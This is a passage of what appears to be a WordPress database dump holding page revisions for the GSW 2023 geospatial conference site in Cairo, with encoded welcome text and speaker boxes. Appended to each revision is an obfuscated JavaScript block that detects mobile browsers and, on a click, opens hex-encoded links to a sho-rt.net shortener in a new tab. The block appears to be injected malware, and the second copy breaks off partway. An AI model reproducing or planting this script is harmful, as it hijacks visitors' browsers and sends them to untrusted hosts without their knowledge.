dobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][vc_row][vc_column][vc_video link=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\" align=\"center\" title=\"dr-ismael\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:55:14','2022-11-09 21:55:14','',3233,'https://gsw2023.com/?p=3253',0,'revision','',0),
(3254,1,'2022-11-09 21:56:30','2022-11-09 21:56:30','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"0\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 0px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box][vc_row][vc_column][ultimate_video video_type=\"vimeo_video\" vimeo_video_url=\"https://gsw2023.com/wp-content/uploads/2022/11/dr-ismael.mp4\" vimeo_start_time=\"2\" vimeo_autoplay=\"\" vimeo_loop=\"\" play_size=\"75\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 